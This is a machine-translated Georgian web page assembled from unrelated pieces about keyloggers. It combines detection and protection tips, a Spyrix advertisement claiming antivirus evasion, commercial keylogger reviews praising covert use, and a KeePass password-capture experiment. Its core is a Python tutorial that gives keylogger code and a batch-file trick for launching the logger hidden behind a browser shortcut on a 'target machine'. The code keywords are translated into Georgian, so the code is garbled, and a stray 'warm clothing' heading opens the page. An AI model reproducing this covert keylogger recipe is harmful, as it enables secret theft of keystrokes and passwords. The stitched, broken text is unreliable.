თბილი ტანსაცმელი

გჭირდებათ keylogger?               ინფორმაციის უსაფრთხოების ლაბორატორია ორი ტიპის keylogger და როგორ მოქმედებს ისინი თქვენს კომპიუტერზე.

06.10.2023

როგორ მოვძებნოთ keyloggers

რაც არ უნდა მზაკვარი keyloggers იყოს, მათი აღმოჩენა მაინც შესაძლებელია. რამდენიმე გზა არსებობს.

  • ძიება ხელმოწერებით

ეს მეთოდი საშუალებას გაძლევთ ზუსტად განსაზღვროთ keylogger-ების არსებობა. მაგრამ ხელმოწერის სკანერს შეუძლია აღმოაჩინოს ობიექტები, რომლებიც უკვე ცნობილია და აღწერილია მის მონაცემთა ბაზაში, ამიტომ ეს მოითხოვს, რომ მონაცემთა ბაზა იყოს დიდი და მუდმივად განახლებული.


  • ევრისტიკული ალგორითმები

ეს მეთოდი პოულობს keylogger-ს მისი დამახასიათებელი მახასიათებლების საფუძველზე და საშუალებას გაძლევთ აღმოაჩინოთ სტანდარტული კლავიატურის ხაფანგები. კვლევამ აჩვენა, რომ ასობით კეთილთვისებიანი, არა კლავიატურის პროგრამა აყენებს ხაფანგებს თქვენი მაუსის და კლავიატურის შეყვანის თვალყურის დევნებისთვის. მაგალითად, კარგად ცნობილი Punto Switcher პროგრამა, პროგრამული უზრუნველყოფა მულტიმედიური კლავიატურებისთვის და მაუსებისთვის.

  • ჯაშუშების მიერ გამოყენებული API ფუნქციების მონიტორინგი

მეთოდი ეფუძნება კლავიშების მიერ გამოყენებული რიგი ფუნქციების ჩარევას, როგორიცაა SetWindowsHookEx, UnhookWindowsHookEx, GetAsyncKeyState, GetKeyboardState.

სისტემის მიერ გამოყენებული დრაივერების, პროცესების, სერვისების თვალყურის დევნება

მეთოდი შესაფერისია არა მხოლოდ keylogger-ების თვალყურის დევნებისთვის. გამოყენების უმარტივესი შემთხვევაა ისეთი პროგრამის გამოყენება, როგორიცაა Kaspersky Inspector, რომელიც აკონტროლებს სისტემაში ახალი ფაილების გამოჩენას.

როგორ დავიცვათ თავი keylogger-ისგან

ხშირად, ცნობილი keyloggers უკვე დაემატა მონაცემთა ბაზას და, შესაბამისად, დაცვის მეთოდი იგივეა, რაც ნებისმიერი მავნე პროგრამის წინააღმდეგ:

  • ანტივირუსული პროდუქტის დაყენება;
  • განახლებული მონაცემთა ბაზის შენარჩუნება.

აღსანიშნავია, რომ ანტივირუსული პროგრამების უმეტესობა კლავიშებს კლასიფიცირებს, როგორც პოტენციურად საშიშ პროგრამულ უზრუნველყოფას და აქ აუცილებელია განვმარტოთ, რომ ნაგულისხმევ პარამეტრებში ანტივირუსული პროდუქტი აღმოაჩენს ამ ტიპის პროგრამის არსებობას. თუ არა, მაშინ უნდა გააკეთოთ პარამეტრები ხელით, რათა დაიცვათ თავი ყველაზე გავრცელებული ჯაშუშური პროგრამებისგან.

ზოგადად, რადგან keylogger-ები მიზნად ისახავს კონფიდენციალური მონაცემების თვალთვალისკენ, თქვენ უნდა მიმართოთ უსაფრთხოების შემდეგ მეთოდებს:

ერთჯერადი პაროლების/ორფაქტორიანი ავთენტიფიკაციის გამოყენება

პროაქტიული თავდაცვის სისტემების გამოყენება, რომელიც საშუალებას გაძლევთ გააფრთხილოთ მომხმარებელი keylogger პროგრამების ინსტალაციის/გააქტიურების შესახებ

ვირტუალური კლავიატურის გამოყენებით, რომელიც ასახავს კლავიატურას ეკრანზე გამოსახულების სახით, საშუალებას გაძლევთ დაიცვათ თავი როგორც პროგრამული უზრუნველყოფის, ასევე აპარატურის ჯაშუშებისგან.

keylogger-ების პოვნა და წაშლა

რა გზები არსებობს ამ ბოროტი სულისგან თავის დასაცავად?

  • ნებისმიერი ანტივირუსული პროგრამა
  • კომუნალური საშუალებები ხელმოწერისა და ევრისტიკული საძიებო მექანიზმებით (მაგალითად, AVZ).
  • კომუნალური და პროგრამები, რომლებიც მიზნად ისახავს keylogger-ების აღმოჩენას და მათი მუშაობის დაბლოკვას. დაცვის ეს მეთოდი ყველაზე ეფექტურია, რადგან ეს პროგრამა, როგორც წესი, ბლოკავს თითქმის ყველა ტიპის keylogger-ს.

აღსანიშნავია, რომ პროგრამულ უზრუნველყოფას, რომელიც მიზნად ისახავს keylogger-ების დაჭერას, აქვს ორი ფუნქცია: ამ ტიპის პროგრამული უზრუნველყოფა ძირითადად ფასიანია და რუსული ენა იშვიათად არის წარმოდგენილი.

მაგალითად, ინგლისურენოვანი უფასო პროგრამული უზრუნველყოფა Advanced Spyware Remover ათავისუფლებს adware-ს, აბონენტებს, spyware-ს, keylogger-ებს და ა.შ.

ინსტალაცია სტანდარტულია, თქვენ უნდა დააჭიროთ "შემდეგი", ძნელია შეცდომის დაშვება. ინსტალაციის შემდეგ მოგეთხოვებათ პროგრამის გაშვება. სკანირებისთვის დააჭირეთ "ახლავე სკანირებას".

თუმცა, აღსანიშნავია, რომ პროგრამა 3 წელია არ განახლებულა.

ზოგადად, ეს პროგრამა ამოწმებს სისტემის რეესტრს მასში მავნე პროგრამის გასაღებების არსებობისთვის. პროგრამას აქვს გარკვეული ფუნქციონირება, რითაც საშუალებას გაძლევთ აჩვენოთ ჩატვირთული პროგრამების სია ოპერაციული სისტემის დაწყებისას („HiJack Scan→Startup“), აჩვენოთ სერვისების სია, აჩვენოთ აქტიური პორტები, ნახოთ Internet Explorer ქუქიები და ა.შ. სკანირების შემდეგ, მსგავსი ფანჯარა გამოჩნდება:

თუ რაიმე ახალს მიაქცევთ ყურადღებას, შეგიძლიათ გამოიყენოთ Spyware Terminator 2012 (თუმცა არა უფასოდ). პროგრამას შეუძლია აღმოაჩინოს და წაშალოს თითქმის ყველა სახის მავნე პროგრამა. ჩაშენებული უსაფრთხოების სისტემა ააქტიურებს აპლიკაციისა და სისტემის დაცვას და აკონტროლებს კომუნალურ კომპანიებს, რომლებიც უშუალოდ ურთიერთობენ ქსელთან.

  • ბუფერში ჩასმა,
  • კლავიშების დაჭერა,
  • ფანჯრებიდან ტექსტის გადაღება

და უფრო მეტი. Anti-keylogger არ იყენებს ხელმოწერის მონაცემთა ბაზებს, რადგან ის დაფუძნებულია მხოლოდ ევრისტიკულ ალგორითმებზე. Anti-keylogger-ს შეუძლია დაიცვას მიზანმიმართული თავდასხმები, რომლებიც ძალიან საშიშია და პოპულარულია კიბერკრიმინალებში. ის განსაკუთრებით ეფექტურია კლავიშების წინააღმდეგ ბრძოლაში ხაფანგების, ციკლური გამოკითხვისა და კლავიატურის ფილტრის დრაივერის გამოყენებით.

Anti-keylogger-ს აქვს უფასო ვარიანტი, შეზღუდული გამოყენების დროით - 10 სამუშაო სესია, თითოეული გრძელდება 2 საათი, რაც სავსებით საკმარისია თქვენი კომპიუტერის ერთდროულად შესამოწმებლად.

მაშ, რა გვაქვს:

  1. Keyloggers იყიდება, როგორც ლეგიტიმური პროგრამული უზრუნველყოფა, მაგრამ ბევრი მათგანი შეიძლება გამოყენებულ იქნას მომხმარებლების პირადი ინფორმაციის მოსაპარად.
  2. დღეს ქეილოგერები, ფიშინგთან ერთად და ა.შ., ელექტრონული თაღლითობის ერთ-ერთ მთავარ მეთოდად იქცა.
  3. გაიზარდა მავნე პროგრამების რაოდენობა keylogger-ის ფუნქციონირებით.
  4. პროგრამული keylogger-ების განაწილება rootkit ტექნოლოგიებზე დაფუძნებული, რაც მათ უხილავს ხდის მომხმარებლისთვის და ანტივირუსული სკანერებისთვის.
  5. ჯაშუშობის გამოვლენა keylogger-ების გამოყენებით მოითხოვს სპეციალიზებული უსაფრთხოების ინსტრუმენტების გამოყენებას.
  6. მრავალ დონის დაცვის საჭიროება (ანტივირუსული პროდუქტები საშიში პროგრამული უზრუნველყოფის გამოვლენის ფუნქციით, პროაქტიული დაცვის საშუალებები, ვირტუალური კლავიატურა).

დატოვეთ თქვენი კომენტარი!

რისთვის გამოიყენება keyloggers (keyloggers):
1. ბავშვებისა და ახლობლების კონტროლი
Spyrix Keylogger Free გაძლევთ საშუალებას აკონტროლოთ თქვენი ბავშვების კომპიუტერის გამოყენება. თქვენ დაიცავთ თქვენს შვილებს ინტერნეტში არსებული არასასურველი ინფორმაციისგან (სექსი, ნარკოტიკები, თვითმკვლელობა, აზარტული თამაშები და ა.შ.) და დაიცავთ მათ საშიშ ადამიანებთან კონტაქტისგან.
2. თანამშრომლების კონტროლი და დაცვა ინფორმაციის გაჟონვისგან.
Spyrix Keylogger Free შეიძლება გამოყენებულ იქნას თანამშრომლების მიმოწერის მონიტორინგისთვის სამუშაო კომპიუტერებზე და გააკონტროლოს სამუშაო დროის გამოყენება.
Spyrix Keylogger Free ძირითადი მახასიათებლები:

  • ახალი! დისტანციური მონიტორინგი უსაფრთხო ვებ ანგარიშის საშუალებითსაკმარისია ერთხელ შეხვიდეთ კომპიუტერზე, რომლის მონიტორინგიც გსურთ და იქ დააინსტალიროთ Spyrix Keylogger Free პროგრამა. მომავალში შეგროვებული ინფორმაციის ნახვას თქვენი ვებ ანგარიშის საშუალებით შეძლებთ ნებისმიერი ადგილიდან, სადაც არის ინტერნეტი და ნებისმიერი მოწყობილობა (კომპიუტერი, ლეპტოპი, ტაბლეტი ან სმარტფონი).
  • Keylogger (keylogger)კლავიატურაზე დაჭერილი კლავიშების შესახებ ინფორმაციის ჩაწერა ჟურნალის ფაილში (ინახავს თუნდაც წაშლილ სიმბოლოებს)
  • 100% შეუძლებელი ანტივირუსული პროგრამებითანტივირუსული და ანტიჯაშუშური პროგრამები ხშირად აღმოაჩენენ და ბლოკავს ამ აპლიკაციებს. Spyrix Keylogger Free მშვენივრად იმალება ანტივირუსული პროგრამებისგან, ანტი-rootkits-ისგან და ანტი-სპივერული პროგრამებისგან.
  • დისტანციური დეინსტალაციათქვენ შეგიძლიათ წაშალოთ Spyrix Keylogger Free სასურველ კომპიუტერზე დისტანციურად ვებ ანგარიშის მეშვეობით.
  • აპლიკაციის თვალყურის დევნებაყველა გაშვებული აპლიკაციის ნახვა, თამაშების ჩათვლით
  • ეკრანის ანაბეჭდები (ეკრანის ანაბეჭდები)ეკრანის ანაბეჭდების შექმნა მნიშვნელოვნად აფართოებს კომპიუტერის მონიტორინგის შესაძლებლობებს და საშუალებას გაძლევთ გადაიღოთ ნებისმიერი აპლიკაციის (მათ შორის ICQ, SKYPE და ა.შ.) ფანჯრები და ვებსაიტები (მაგალითად, vkontakte, Odnoklassniki)
  • მომხმარებლის აქტივობაSpyrix Keylogger Free ჩაიწერს აქტიური და არააქტიური კომპიუტერის გამოყენების დროს
  • მოსახსნელი დისკების კონტროლი (USB, HDD, SD)
  • პრინტერის კონტროლი

Spyrix Keylogger Free არის ყველაზე ძლიერი უფასო keylogger ბაზარზე. Spyrix Keylogger Free არის ერთადერთი ჭეშმარიტად უფასო keylogger, რომელიც უზრუნველყოფს დისტანციური მონიტორინგის ფუნქციას.

მთავარი ფანჯარა:

დაიცავით ვებ ანგარიში:


პარამეტრების ოსტატი:

გამარჯობა, QUAZAR ისევ აქ არის. დღეს მე გაჩვენებთ როგორ შევქმნათ მარტივი keylogger Python-ში. რა თქმა უნდა, ეს keylogger ვერ გაუწევს კონკურენციას ისეთ გიგანტებს, როგორიც არის, მაგრამ ამის მიუხედავად, მას შეუძლია მისი გამოყენება.

რა არის keylogger?

თქვენ შეგიძლიათ დეტალურად წაიკითხოთ რა არის keylogger და კლავიშების ტიპების შესახებ სტატიაში „“. ამ თემაზე დამატებითი მასალების მოსაძიებლად გამოიყენეთ საიტის ძებნა, რომელიც მდებარეობს ზედა მარჯვენა კუთხეში. უბრალოდ შეიყვანეთ სიტყვა "keylogger" ან "keylogger".

მარტივი keylogger Python-ში

Keylogger-ის შესაქმნელად ჩვენ გვჭირდება:

  • ოპერაციული სისტემა: Windows ან MacOs (ნებისმიერი Linux-ის გამოყენება ასევე შესაძლებელია, მაგრამ მე პირადად არ მიცდია)
  • სამიზნე მანქანაზე დაინსტალირებული პითონი, ასევე სპეციალური ბიბლიოთეკები.

ეს მასალა მხოლოდ საინფორმაციო მიზნებისთვისაა. ამ სტატიაში წარმოდგენილი ინფორმაცია მოცემულია მხოლოდ საინფორმაციო მიზნებისთვის. არც ვებსაიტის www.site-ის რედაქტორები და არც პუბლიკაციის ავტორი არ ეკისრებათ პასუხისმგებლობას ამ სტატიის მასალებით მიყენებულ რაიმე ზიანს.

მარტივი Keylogger-ის შექმნა Python-ში

ჯერ უნდა ჩამოტვირთოთ და დააინსტალიროთ Python.


მარტივი keylogger Python-ში

Python-ის დაყენების შემდეგ, თქვენ უნდა დააინსტალიროთ "pyHook" და "pywin32" მოდულები. ამ საიტზე ნახავთ 32 და 64 ბიტიან ვერსიებს Windows-ისთვის და სხვა ოპერაციებისთვის. ჩამოტვირთეთ "PYhook" და "pyWin32" Python-ისა და Windows-ის თქვენი დაინსტალირებული ვერსიის მიხედვით (32bit ან 64bit).


Keylogger პითონში. PYhook მოდული
Keylogger Python-ში. pyWin32 მოდული

ჩამოტვირთვის შემდეგ დააინსტალირეთ და გახსენით IDLE (Python GUI) მენიუ Start მენიუდან.

მარტივი keylogger Python-ში

გადადით "ფაილი" მენიუში და დააწკაპუნეთ პუნქტზე "ახალი ფაილი". შემდეგ ჩასვით keylogger კოდი:

#სახელი: QUAZAR
#ვებგვერდი: www.site
იმპორტი pyHook, pythoncom, sys, logging
file_log = "C:keyloggerlog.txt"
def OnKeyboardEvent(event):
logging.basicConfig(filename=file_log, level=logging.DEBUG, format="%(message)s")
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
დაბრუნება True
hooks_manager = pyHook.HookManager()
hooks_manager.KeyDown = OnKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()

და შეინახეთ ფაილზე Keylogger.pyw დარეკვით. უბრალოდ არ შეინახოთ ფაილი root დირექტორიაში C: სადაც გჭირდებათ ადმინისტრატორის უფლებები ფაილების კოპირებისთვის და წასაშლელად. შექმენით ახალი საქაღალდე თქვენს C: დისკზე ან სხვა ადგილას, სადაც არ გჭირდებათ ადმინისტრატორის უფლებები ფაილების კოპირებისთვის და იქ შეინახეთ Keylogger.pyw.

თქვენ შეგიძლიათ აირჩიოთ ნებისმიერი ადგილი, როგორც გამომავალი ანგარიშის ფაილი "file_log = "C:keyloggerlog.txt", მაგრამ სასურველია, რა თქმა უნდა, რაიმე დამალული ადგილი თქვენს მყარ დისკზე. ამ მაგალითში მე შევინახავ მოხსენების ფაილს დისკზე root დირექტორიაში C:. ბოლოს და ბოლოს, დასამალი არაფერი მაქვს.

Keylogger-ის ავტომატური გაშვება Python-ში

Keylogger მზად არის. ახლა ჩვენ უნდა დავრწმუნდეთ, რომ keylogger დაიწყება მომხმარებლისგან დამალული და ავტომატურად Windows-ის ჩატვირთვისას. ეს შეიძლება განხორციელდეს სხვადასხვა გზით. მოდით ვცადოთ ამის გაკეთება bat ფაილის გამოყენებით, keylogger-ის გაშვების მიბმა რომელიმე პროგრამასთან ან დარეგისტრირებით გაშვებაში.

პირველი, შექმენით bat ფაილი. დააკოპირეთ და ჩასვით შემდეგი კოდი Notepad-ში:

::სახელი: QUAZAR
:: ვებგვერდი: www.site
@echo გამორთულია
დაწყება "" "C:keyloggerkeylogger.pyw"
დაწყება "" "C:Program FilesOperalauncher.exe"

პირველ სტრიქონში თქვენ უნდა შეიყვანოთ გზა keylogger.pyw ფაილისკენ (ჩემს შემთხვევაში "C:keylogger.pyw"). მეორე სტრიქონში, თქვენ უნდა შეიყვანოთ პროგრამის გზა, რომელსაც მომხმარებელი ჩვეულებრივ იყენებს (ჩემს შემთხვევაში, Opera ბრაუზერი).

რედაქტირების შემდეგ შეინახეთ ფაილი .bat გაფართოებით (ჩემს შემთხვევაში logger.bat) თქვენს კომპიუტერში დამალულ ადგილას (ჩემს შემთხვევაში "C:keylogger.bat"-ში).

ახლა გადადით სამუშაო მაგიდაზე და აირჩიეთ მალსახმობი ხშირად გამოყენებული პროგრამისთვის (ჩემს შემთხვევაში ეს არის Opera ბრაუზერი). დააწკაპუნეთ მაუსის მარჯვენა ღილაკით კონტექსტური მენიუს გამოსაძახებლად და გადადით მალსახმობების თვისებებზე. "ობიექტის" ველში შეიყვანეთ გზა keylogger bat ფაილის "C:keyloggerlogger.bat".

ცვლილებების შეტანის შემდეგ, მალსახმობის ხატულაც შეიცვლება. მაგრამ ეს მარტივად შეიძლება გადაწყდეს თვისებების ჩანართზე (იხილეთ ეკრანის სურათი ზემოთ).

KeePass-ის საშუალებით შეყვანილი პაროლების უსაფრთხოების შესამოწმებლად, გადავწყვიტე დამეწერა მარტივი კლავიშები დამატებითი მონაცემების აღებით ბუფერიდან. მთელ კოდს რამდენიმე სტრიქონი დასჭირდა FreePascal-ში.

პაროლები, უსაფრთხოების დამატებითი ზომებისა და KeePass-ის სათანადო კონფიგურაციის გარეშე, საკმაოდ დაუცველი აღმოჩნდა.

Keylogger კოდი მოთავსებულია Timer loop-ში, რომელიც განახლდება ყოველ 10 ms. გამოყენებული მოდულები: Windows და ClipBrd.

//შეადარეთ კლავიშების მიმდინარე მდგომარეობა f:= 0-დან 255-მდე გააკეთეთ, თუ a[f]<>GetAsyncKeyState(f) შემდეგ დაიწყეთ //რეაქცია კლავიშის დაჭერაზე, თუ KeePass.Checked და (GetAsyncKeyState(f) = 0) შემდეგ Memo1.Caption:= Memo1.Caption + chr(f); //რეაქცია კლავიშზე დაჭერით თუ არა KeePass.Checked და (GetAsyncKeyState(f)<>0) შემდეგ Memo1.Caption:= Memo1.Caption + chr(f); დასასრული;<>//გასაღებების ამჟამინდელი მდგომარეობა შეინახეთ მასივში f:= 0-დან 255-მდე do a[f] := GetAsyncKeyState(f); //ჩაწერეთ ბუფერში ცვლილებების შეტანისას, თუ s
Clipboard.AsText შემდეგ იწყება s:= Clipboard.AsText; Memo2.Caption:= Memo2.Caption + s + " "; დასასრული;

Simple Logger პროგრამა ასე გამოიყურება:

-Keyboard- ფანჯარა აჩვენებს კლავიშებს ასოების და შეყვანის ენის გარეშე. გამოსახულია სიმბოლო, რომლის რიცხვიც უდრის გასაღების კოდს: chr(f). პროგრამა შეიძლება შეიცვალოს ყველა სიმბოლოს სწორად ჩვენების მიზნით, მაგრამ ეს არ არის საჭირო ამ კვლევისთვის.

კოპირება -Clipboard- ფანჯარაში ხდება, როდესაც იცვლება ბუფერის შინაარსი.

KeePass-ის სისუსტეები და მათი აღმოფხვრა

1. შეიყვანეთ მთავარი პაროლი

ნაგულისხმევად, KeePass-ში მთავარი პაროლი შეყვანილია უსაფრთხო რეჟიმის გარეშე, ამიტომ მისი მარტივად დადგენა შესაძლებელია Simple Logger-ში. ეს არის უსაფრთხოების ყველაზე კრიტიკული ადგილი, რადგან... აქ ჩვენ ერთდროულად მივიღებთ წვდომას პაროლის მთელ მონაცემთა ბაზაზე.

პრობლემის გადასაჭრელად, თქვენ უნდა ჩართოთ უსაფრთხოების პარამეტრი "შეიყვანეთ ძირითადი პაროლი დაცულ რეჟიმში (Windows Vista-ში და უფრო მაღალზე UAC-ის მსგავსი). ეს რეჟიმი ხელს უშლის ლოგერს კლავიატურაზე წვდომას. გარდა ამისა, შეუძლებელია სკრინშოტის გადაღება Key File-ის ადგილმდებარეობის დასადგენად.

ეს რეჟიმი გააქტიურებულია მხოლოდ ძირითადი პაროლის შეყვანისას. სხვა პაროლების დაცვა შემდგომში იქნება განხილული.

2. ბუფერი

Simple Logger პასუხობს ბუფერში ცვლილებებს წამში 100-ჯერ. ამრიგად, პაროლის ბუფერში შეყვანა და რამდენიმე წამის შემდეგ მისი წაშლა ამ შემთხვევაში დაცვას არ უზრუნველყოფს.

ამ პრობლემის გადასაჭრელად შეგიძლიათ გამოიყენოთ Auto Dial.

3. ავტომატური აკრიფეთ

KeePass-ის ავტომატური აკრეფის პასუხი ხდება ღილაკის დაჭერით და არა მისი დაჭერით. ეს საშუალებას გაძლევთ მიიღოთ დაცვა ზოგიერთი keylogger-ისგან. ამის თავიდან ასაცილებლად, Simple Logger-ს აქვს დამატებითი პარამეტრი: „KeePass Auto-Type“. თუ ის ჩართულია, ლოგერი ამოქმედდება ღილაკის დაჭერისას. KeePass-ით ავტომატური აკრეფისას:

MyLoginName LongPassword123

Simple Logger არანაირად არ ითვალისწინებს კლავიატურის მალსახმობებს. როგორც ხედავთ, Shift ღილაკი ნაჩვენებია სპეციალური სიმბოლოს სახით („+“-ის მსგავსი) და „?“. Shift იხსნება როგორც დიდი ასოების წინ, ასევე მის შემდეგ. თუმცა, ეს საკმარისია პაროლის გასაგებად.

ამ პრობლემის გადასაჭრელად შეგიძლიათ გამოიყენოთ „ორმაგი ავტომატური აკრეფის სირთულე“ პარამეტრი KeePass-ში. ამ შემთხვევაში, KeePass შეიყვანს პაროლის ნაწილს კლავიატურიდან და ნაწილს ბუფერში, აერიებს მნიშვნელობებს. ეს საშუალებას გაძლევთ გვერდის ავლით ზოგიერთი keylogger.

Simple Logger რეაგირებს ავტომატური აკრეფის ორმაგ გართულებაზე შემდეგნაირად:

  • გაცვლის ბუფერიდან ჩასმა "Ctrl + V" ნაჩვენებია როგორც "V◄?";
  • მარცხენა ისარი – “%” (გასაღების კოდი და სიმბოლო #37);
  • მარჯვენა ისარი - """ (გასაღების კოდი და სიმბოლო #39).
შეგიძლიათ დაწეროთ პატარა ალგორითმი და აღადგინოთ სწორი პაროლი ორივე ფანჯრის მონაცემების გამოყენებით. ეს პარამეტრი ართულებს keylogger-ის მუშაობას, მაგრამ არ იძლევა დაცვის გარანტიას - სურვილის შემთხვევაში პაროლის ადვილად აღდგენა შესაძლებელია.

დამატებითი დაცვის ზომები დაგეხმარებათ KeePass-ისთვის შექმნილი keylogger-ის წინააღმდეგ.

4. დამატებითი დაცვა

ზოგიერთ პროგრამულ პაკეტს აქვს ისეთი ფუნქციები, როგორიცაა:
  • ტექნიკური კლავიატურიდან მონაცემთა შეყვანის დაცვა;
  • უსაფრთხო ბრაუზერი.
როდესაც ჩართავთ მონაცემთა შეყვანის დაცვას ტექნიკის კლავიატურიდან, Simple Logger ვეღარ მიიღებს მონაცემებს KeePass-ის ავტომატური აკრეფიდან, თუ ის შეყვანილია პაროლის ფორმაში ბრაუზერში. ამ შემთხვევაში, სუსტი წერტილი იმუშავებს ბუფერში.

დაცული ბრაუზერის გამოყენებისას შეუძლებელი იყო ბუფერზე და კლავიატურაზე წვდომა Simple Logger-ის გამოყენებით. გარდა ამისა, სკრინშოტების გადაღების საშუალება არ იყო.

დასკვნის ნაცვლად

მას შემდეგ რაც დავაკვირდი, როგორ იყენებენ ჩვენი თანამშრომლები KeePass-ს, აღმოვაჩინე, რომ ზოგიერთი:
  • არ გამოიყენოთ UAC;
  • არ გამოიყენოთ ავტომატური აკრიფეთ, უბრალოდ დააკოპირეთ პაროლები ბუფერის მეშვეობით;
  • დატოვეთ პროგრამა ღია სამუშაო ადგილიდან გასვლისას;
  • გამოიყენეთ ნაგულისხმევი პარამეტრები უსაფრთხოების პოლიტიკის კონფიგურაციის გარეშე.
ვარ მენეჯერი პატარა კომპანიაში, ცოტა მაინტერესებს პროგრამირება. მე არ ვარ ტექნიკური და უსაფრთხოების ექსპერტი, ამიტომ მოხარული ვიქნები, თუ უფრო გამოცდილი სპეციალისტები მიუთითებენ ჩემი პატარა კვლევის ნაკლოვანებებზე.

მე გამოვცადე KeePass 2.36-ის უახლესი ვერსია Windows 8.1-ზე. სამართლიანობისთვის, უნდა აღინიშნოს, რომ ეს პრობლემა არ არის მხოლოდ KeePass-ის პრობლემა. არსებობს მრავალი სხვა პაროლის დამცავი საიმედოობის უფრო დიდი ან ნაკლები ხარისხით, მაგრამ ეს სხვა კვლევის თემაა.

ბმულები

  1. მარტივი ლოგერი GitHub-ზე
    //ვინ ზრუნავს, შეგიძლიათ იპოვოთ exe ფაილი "SimpleLogger_for_Win64.7z" არქივში. პროგრამა არ იძლევა კლავიშების სრულ ჩაწერას, ის განკუთვნილია უსაფრთხოების კვლევისა და საინფორმაციო მიზნებისთვის.
UPD (07/27/2017)

ბრაუზერის მოდული

როგორც მომხმარებელმა dartraiden-მა აღნიშნა, მოდულის გამოყენება შესაძლებელია KeepPassHttpბრაუზერის დანამატთან ერთად PassIFoxან ChromeIPass. ეს მოდული (დეველოპერის მიხედვით) უზრუნველყოფს KeePass-ის ჩანაწერების უსაფრთხო გამოვლენას HTTP-ზე.

ეს კომბინაცია საშუალებას გაძლევთ ავტომატურად შეავსოთ თქვენი შესვლა და პაროლი ბრაუზერში, როდესაც KeePass განბლოკილია. Simple Logger არანაირად არ რეაგირებს ამ შემთხვევაში.

ChromeIPass-ის სუსტი წერტილი არის ახალი პაროლის გენერაცია, რადგან... ის კოპირებულია ბუფერში და ჩანს ეკრანზე. ამ შემთხვევაში, უმჯობესია ახალი პაროლის გენერირება თავად KeePass-ში.

ახალი ძირითადი პაროლის შექმნა

როგორც arthur_veber-მა აღნიშნა:
ძირითადი პაროლის შეცვლისას, ასევე ახლის შექმნისას, უსაფრთხო რეჟიმი არ გამოიყენება.

ამ შემთხვევაში, Simple Logger წყვეტს KeePass-ში შეყვანილ მთავარ პაროლს.

არც ცნობილი მწარმოებლის ვირტუალური ეკრანის კლავიატურა გვეხმარება, რომელიც KeePass-ის ავტომატური აკრიფეს მსგავსად მუშაობს ღილაკზე დაჭერის მოვლენის საფუძველზე.

აქ რჩევის მიცემა რთულია. ჩვენ ალბათ გვჭირდება დეველოპერების ყურადღება ამ პრობლემაზე მივაქციოთ.

თავდასხმის სხვა საშუალებები

როგორც მომხმარებელმა qw1 პირველმა აღნიშნა, თუ სისტემა, რომელზედაც დაყენებულია KeePass დაზიანებულია, მაშინ Keylogger-ის გარდა შეტევის სხვა საშუალებების გამოყენება შესაძლებელია. ამ შემთხვევაში, თავდასხმის საწინააღმდეგო მოქმედებების ჩამონათვალი დამოკიდებული იქნება კონკრეტულ სიტუაციაზე.

სამწუხაროდ, შეუძლებელია ერთ სტატიაში გაშუქდეს უსაფრთხოების ყველა ზომა, რაც აუცილებელია პაროლების შესანახად.

Keylogger არ არის რაიმე სახის იარაღი ჰაკერებისთვის ან ერთგვარი კონტროლის ინსტრუმენტი ყველა სახის საიდუმლო ორგანიზაციისთვის, მაგრამ არის სტანდარტული საშუალება პირადი უსაფრთხოების უზრუნველსაყოფად, რომელიც მოითხოვს თითქმის ყველა მოქალაქს. ასეთი პროგრამული უზრუნველყოფა განსაკუთრებით აუცილებელია, თუ რამდენიმე ადამიანს აქვს წვდომა მის მოწყობილობაზე.

თუმცა, დროთა განმავლობაში, ასეთ კომუნალურ მომსახურებაზე მოთხოვნა იმდენად გაიზარდა, რომ მრავალმა კომპანიებმა დაიწყეს მათი განვითარება და ყველა keylogger არ არის შესაფერისი გარკვეულ სიტუაციებში. სწორედ ამ მიზეზის გამო, უმჯობესია წინასწარ განსაზღვროთ, რა თვისებები და უპირატესობები აქვს თითოეულ ინდივიდუალურ პროგრამას.

SC-KeyLog

ეს არის keylogger, რომელიც სრულად იწერს ყველა დაჭერილ კლავიშს, ხოლო ყურადღებით შიფრავს მის მიერ ჩაწერილ მონაცემებს. სხვა საკითხებთან ერთად, გასათვალისწინებელია, რომ პროგრამა იძლევა ჟურნალების დისტანციურად ნახვის შესაძლებლობას.

ნებისმიერი მსგავსი პროგრამის მსგავსად, ეს პროგრამა იწერს ნებისმიერი ტიპის ელ.ფოსტის ტექსტებს, ასევე შეტყობინებებს სხვადასხვა მოწყობილობებში. პროგრამა ასევე აღრიცხავს ტექსტურ ფაილებში ყველა სახის ცვლილებას, მონაცემებს, რომლებსაც ადამიანი შეაქვს ვებ გვერდებზე, მაუსის დაწკაპუნებებს, გახსნილი ფანჯრების სახელებს, სხვადასხვა პროგრამების გაშვებისა და დახურვის დროს. აღსანიშნავია, რომ ეს პროგრამა ასევე ინახავს აკრეფილ მომხმარებლის პაროლებს და ბევრ სხვა ელემენტს.

ფუნქციონალური

თქვენ შეგიძლიათ შეიყვანოთ სწორი პარამეტრები Wizard-ის გამოყენებით, რომელიც მყარ დისკზე პროგრამის დაინსტალირების შემდეგ დაუყოვნებლივ გამოჩნდება თქვენს თვალწინ.

აღსანიშნავია, რომ პროგრამა საკმაოდ აქტიურად არის გამოვლენილი თითქმის ნებისმიერი ანტივირუსული პროგრამის მიერ, ასე რომ არ უნდა იფიქროთ, რომ შეძლებთ მის ფარულად გამოყენებას.

Ardamax Keylogger

პროგრამის ზომა საკმაოდ სტანდარტულია ამ კლასის კომუნალური პროგრამებისთვის და არის 392 კბ. თავად უტილიტა არის სრულიად საშუალო და ამავე დროს ადვილად გამოსაყენებელი keylogger. პროგრამა ავტომატურად აკონტროლებს და მუდმივად ინახავს კლავიშების დარტყმებს კლავიატურიდან, ერთდროულად მიუთითებს დროს, პროგრამის სახელს, რომელშიც მონაცემები იყო შეყვანილი, ასევე ფანჯრის სახელწოდება. აღსანიშნავია, რომ პროგრამას შეუძლია სრულიად უხილავად იმუშაოს, რადგან მას აქვს საიდუმლო ფუნქციები: ფაილები, ავტომატური ჩამოტვირთვები, დავალების მენეჯერი და მრავალი სხვა. თუ საჭიროა უხილავი მუშაობა, სისტემა ამოქმედდება და კონტროლდება ცხელი კლავიშებით, ხოლო ჟურნალები შეიძლება უბრალოდ გაიგზავნოს კონკრეტულ ელ.ფოსტის ანგარიშზე ან სერვერზე.

როგორ განისაზღვრება?

ამ შემთხვევაში ანტივირუსული პროგრამები არც ისე აქტიურად მუშაობს, ამიტომ სავსებით შესაძლებელია ასეთი პროგრამის ფარულად გამოყენება. ინტერფეისი ძალიან ხელმისაწვდომი და გასაგებია. ერთადერთი უარყოფითი ის არის, რომ პროგრამა ფასიანი და საკმაოდ ძვირია.

ფაქტობრივი ჯაშუში

